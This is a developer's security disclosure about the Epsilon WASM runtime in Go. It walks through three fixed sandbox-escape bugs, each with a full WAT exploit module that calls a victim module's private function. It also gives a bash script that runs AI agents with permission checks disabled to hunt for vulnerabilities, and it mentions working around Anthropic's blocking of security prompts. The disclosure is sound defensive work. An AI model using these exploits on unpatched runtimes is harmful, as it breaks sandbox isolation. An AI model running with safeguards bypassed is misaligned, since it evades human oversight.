All the bugs they found

Last year I wrote a small WASM runtime in Go, Epsilon. As far as runtimes go, this is a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code. It is also very extensively tested against the official WASM testsuite.

Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code.

How many security vulnerabilities do you think AI agents found in it?

More than 20.

Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere.

A handful, though, were properly interesting: sandbox escapes that let a malicious WASM module break out of its isolation and reach into another module's private state. These are my favorites.

Background

A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported (and imported) objects. Unexported functions, memories, etc., are private to the module that defined them.

WASM is a typed stack machine, but the type checking does not happen at runtime: before execution, a validator walks the bytecode and verifies that at any point the values on the stack have the expected type. For example, a module that tried to local.set an i32 into a funcref local would be rejected before it ever started running. Epsilon then executes blindly, trusting the validator's earlier checks.

Thanks to the type guarantees provided by the validator, a funcref at runtime in Epsilon is represented as an int32: -1 is the null sentinel, and any non-negative value is an index into the global function store, shared across all modules instantiated in the runtime. As a result, the constant 0 and a funcref pointing to the first function in the store are indistinguishable during execution. This simplifies the implementation and improves performance, at the cost of delegating safety entirely to the validator.

Each attacker module in the following sections runs alongside the same victim module:

(module
  (func $secret (result i32)   ;; declares a function $secret: takes no parameters,
                               ;; returns a 32-bit integer. Private, never exported
    i32.const 1337             ;; pushes 1337 onto the stack; becomes the return value
  )
)

Since $secret is the first function instantiated into the runtime, it lives at store index 0. The goal of each attacker module is to get the VM to call it, returning 1337, despite never being given a legitimate funcref to it.

1. Zero Is Not Null

The simplest of the three. Here's the attacker:

(module
  (type $t (func (result i32)))   ;; the call_indirect type signature
  (table 1 funcref)               ;; a table of size 1 (essentially an array of funcrefs).
                                  ;; Identified by its module-level index, which is 0
                                  ;; here since it's the first (and only) table declared

  (func (export "exploit") (result i32)
    (local $f funcref)            ;; declared, never assigned;
                                  ;; per spec, ref locals default to null

    i32.const 0                   ;; the slot in the table where we'll write
                                  ;; stack: [0]
    local.get $f                  ;; push $f's value (null)
                                  ;; stack: [0, null]
    table.set 0                   ;; immediate 0 picks which table to write to
                                  ;; (tables[0]); pops two values from the stack:
                                  ;; first the funcref (null), then the slot index.
                                  ;; Writes tables[0][0] = null
                                  ;; stack: []

    i32.const 0                   ;; the slot in the table to fetch from next
                                  ;; stack: [0]
    call_indirect (type $t)       ;; pop the slot, fetch tables[0][slot] (null),
                                  ;; and call it
  )
)

The exploit function, while perfectly valid WASM, should trap at runtime. The local $f is uninitialized, therefore null. call_indirect should fail.

Except that in Epsilon, it didn't. It called $secret instead.

The culprit was how locals were initialized. When a function is called, the spec requires locals to be initialized to their default values: zero for numeric and vector types, but null for reference types. Epsilon achieved this by zeroing all non-parameter locals using Go's clear():

// Clear non-parameter locals to their zero values.
clear(locals[numParams:])

This was idiomatic and fast, but Go's clear() simply set the local to 0. Per our funcref representation, that's not null (-1): it's the store index of $secret. When exploit was called, rather than trapping on a null call_indirect, the VM called the function at store index 0.

Fixed. Repro.

2. Phantom Block Parameter

This one combines two separate bugs:

(module
  (type $t (func (result i32)))
  (table 1 funcref)

  (func (export "exploit") (result i32)
    (local $f funcref)

    ref.null func               ;; push a null funcref onto the stack
    i32.const 0

    (block (param i32)          ;; block consumes the i32 from the stack...
      drop                      ;; ...and immediately drops it
    )

    local.set $f                ;; store top of stack into $f (the null funcref)
    local.get $f
    ref.is_null                 ;; is $f null?

    if (result i32)
      i32.const 42              ;; expected path: $f was null, return 42
    else                        ;; unreachable path: $f is always null
      i32.const 0
      local.get $f
      table.set 0
      i32.const 0
      call_indirect (type $t)
    end
  )
)

In any correct WASM implementation (and indeed in the latest version of Epsilon), exploit returns 42, as expected. It returned 1337 instead.

Stack Height Misalignment

During their execution, control-flow blocks (block, loop, if) may consume inputs from the stack and produce results on it. At the end of execution the stack must look exactly as the block's signature describes: N_params consumed, N_results pushed in their place. Anything the body left in between has to be discarded, so the runtime needs to know how high the stack was when entering the block.

In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack:

vm.pushControlFrame(frame, controlFrame{
    stackHeight: vm.stack.size(),   // height at block entry
    // ...
})

But here lies the first bug: that line captures the stack height after the block's parameters are already pushed. In WASM, parameters are consumed by the block: they belong to the block, not to the surrounding scope. So the validator and the VM now disagree by exactly N parameters about where "the bottom of the block" is on the stack.

Memory Resurrection

When a block ends, the VM calls unwind to restore the stack to its declared, pre-block height. targetHeight is the stack height recorded in the controlFrame structure.

func (s *valueStack) unwind(targetHeight, preserveCount uint32) {
    valuesToPreserve := s.data[s.size()-preserveCount:]
    s.data = s.data[:targetHeight]
    s.data = append(s.data, valuesToPreserve...)
}

Because of the stack height misalignment bug above, targetHeight is too high: it counts the block's parameters as if they were still on the stack. Therefore s.data[:targetHeight] causes the slice to grow back rather than be truncated. As long as targetHeight <= cap(s.data), Go is happy to re-expose whatever was sitting in the backing array.

Parameters that the validator considered consumed are now resurrected on top of the stack.

Bugs Collide

Let's walk through the exploit function with both bugs in mind:

(func (export "exploit") (result i32)
  (local $f funcref)

  ref.null func        ;; stack: [null_funcref]
  i32.const 0          ;; 0 is the index where $secret happens to sit in the
                       ;; global function store, since it was the very first
                       ;; function instantiated
                       ;; stack: [null_funcref, 0]

  (block (param i32)   ;; bug #1: VM records stackHeight = 2; the validator,
                       ;; treating the i32 as consumed (per spec), records 1
    drop               ;; pops and discards the top of the stack (the 0)
                       ;; stack: [null_funcref]
  )                    ;; bug #2: `end` calls unwind, which sets s.data to
                       ;; s.data[:2], so len 1 grows back to 2, and the 0 we
                       ;; dropped resurrects on top. The top is now an int32
                       ;; of value 0, but the validator still thinks it's a
                       ;; funcref
                       ;; stack: [null_funcref, 0]

  local.set $f         ;; 0 is put in $f, which should be a funcref. Since
                       ;; Epsilon's internal representation of funcref is also
                       ;; an int32, this works at runtime
  local.get $f         ;; stack: [null_funcref, 0]
  ref.is_null          ;; null is -1, so 0 isn't null; pops the funcref and
                       ;; pushes 0 (false). The top of the stack visually
                       ;; still looks like 0, but its type changed from
                       ;; funcref to i32
                       ;; stack: [null_funcref, 0 (i32 false)]

  if (result i32)      ;; pops the i32 condition (0, false), so the else
                       ;; branch fires
                       ;; stack: [null_funcref]
    i32.const 42       ;; not taken
  else
    i32.const 0        ;; the slot index for the upcoming table.set
                       ;; stack: [null_funcref, 0]
    local.get $f       ;; the funcref value to store (actually the int32 0)
                       ;; stack: [null_funcref, 0, 0]
    table.set 0        ;; pops the funcref then the slot index; both are 0,
                       ;; so tables[0][0] now holds the integer 0 dressed as
                       ;; a funcref
                       ;; stack: [null_funcref]
    i32.const 0        ;; the slot index within the table to look up
                       ;; stack: [null_funcref, 0]
    call_indirect (type $t)
                       ;; pops the slot index, fetches tables[0][0] (our
                       ;; int 0 dressed as a funcref), which points at
                       ;; store[0] = $secret. Call it.
  end
)

A perfectly valid WASM module just called an unexported function from another module. By choosing a different integer, it could reach any private function in Epsilon's global store.

Fixed. Repro.

3. Ghost in the Stack

The first two exploits relied on the validator and VM disagreeing about values on the stack inside the sandbox. This one shifts category: the disagreement is between a host function's declared signature and what it actually returns at runtime.

(module
  (type $t (func (result i32)))
  (import "env" "leak" (func $leak (result funcref)))   ;; the host must provide env.leak
  (table 1 funcref)

  (func (export "exploit") (result i32)
    i32.const 0          ;; table index
    i32.const 0          ;; index of $secret in the global function store

    call $leak           ;; declared to return a funcref; the validator thinks
                         ;; the stack gains one new value after this call

    table.set 0          ;; store the "result" (actually our 0) into the table
    i32.const 0
    call_indirect (type $t)
    return
  )
)

For this exploit to land, the host needs to provide a function env.leak whose runtime behavior diverges from its signature: one that returns fewer results than promised.

In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature:

res := fun.hostCode(fun.module, args...)
vm.stack.pushAll(res)

If leak returned an empty slice instead of the promised funcref, pushAll did nothing. The validator believed a funcref had been pushed. Instead, the stack was unchanged.

The two 0s pushed before $leak were still on the stack. The VM ran table.set 0 and popped them: one as the funcref, one as the slot index. tables[0][0] now held the integer 0. call_indirect fetched it and happily called the function at index 0, $secret.

Fixed. Repro.

Methodology

I used a combination of approaches to find these bugs, starting with a script similar to the one described in the Black-hat LLMs talk:

Show the script
#!/bin/bash

# Directory to store vulnerability reports
VULN_DIR="vulnerabilities"
mkdir -p "$VULN_DIR"

# List of areas to investigate
AREAS=(
    "epsilon/parser.go"
    "epsilon/validation.go"
    "epsilon/vm.go"
    "epsilon/memory.go"
    "epsilon/imports.go"
    "wasip1/wasi_resources.go"
    "wasip1/wasi_poll.go"
    "wasip1/wasi_unix.go"
)

PROMPT_TEMPLATE="You are an expert security researcher and exploit developer.

STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN_DIR/' directory. Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes in '$VULN_DIR/' only.

Your task is to objectively investigate the following file for security vulnerabilities: %s

Explore the file and any related files, data structures, or interactions it depends on. Where relevant, check behavior against the WebAssembly 2.0 specification (https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf) and the WASI Preview 1 specification — a deviation from spec in security-sensitive code is itself a vulnerability. Do not flag missing features from specs beyond WebAssembly 2.0.

Do not assume a vulnerability exists. If after thorough investigation you find nothing exploitable, state so clearly and stop.

If you confirm a vulnerability:
1. Create a dedicated directory: '$VULN_DIR/<vulnerability_name>/'
2. Write 'README.md' with: root cause, impact, and reproduction steps
3. Write a PoC exploit: a concrete, runnable demonstration (Go test, .wasm file, or script) that proves the vulnerability is triggerable by a malicious WebAssembly module without any special host configuration"

# Get agent from command line, default to claude
AGENT=${1:-claude}

if [ "$AGENT" == "claude" ]; then
    AGENT_CMD="claude --dangerously-skip-permissions"
elif [ "$AGENT" == "gemini" ]; then
    AGENT_CMD="gemini --yolo"
elif [ "$AGENT" == "vibe" ]; then
    AGENT_CMD="vibe --trust"
else
    echo "Usage: $0 [claude|gemini|vibe]"
    exit 1
fi

for AREA in "${AREAS[@]}"; do
    echo "--------------------------------------------------"
    echo "Starting investigation of area: $AREA using $AGENT"
    echo "--------------------------------------------------"

    CURRENT_PROMPT=$(printf "$PROMPT_TEMPLATE" "$AREA")

    $AGENT_CMD -p "$CURRENT_PROMPT"

    echo "Finished investigation of $AREA."
    echo "Sleeping for 10 seconds to respect rate limits..."
    sleep 10
done

Then I moved to a skill instead, which is slightly more convenient.

I'm honestly not sure which one is better as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise to the reader.

To work around token limits, I also used a variety of models, mainly:

  • Gemini 3 Flash
  • Gemini 3.1 Pro
  • Opus 4.7

Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning.

Trying to work around Anthropic blocking security-related prompts does get pretty tiring though.

Closing thoughts

Epsilon is a weekend hobby project, so I went in expecting agents to find something. It was still astonishing to see some of these issues. Bug #2 in particular is pretty cool.

Please update to version 0.1.0.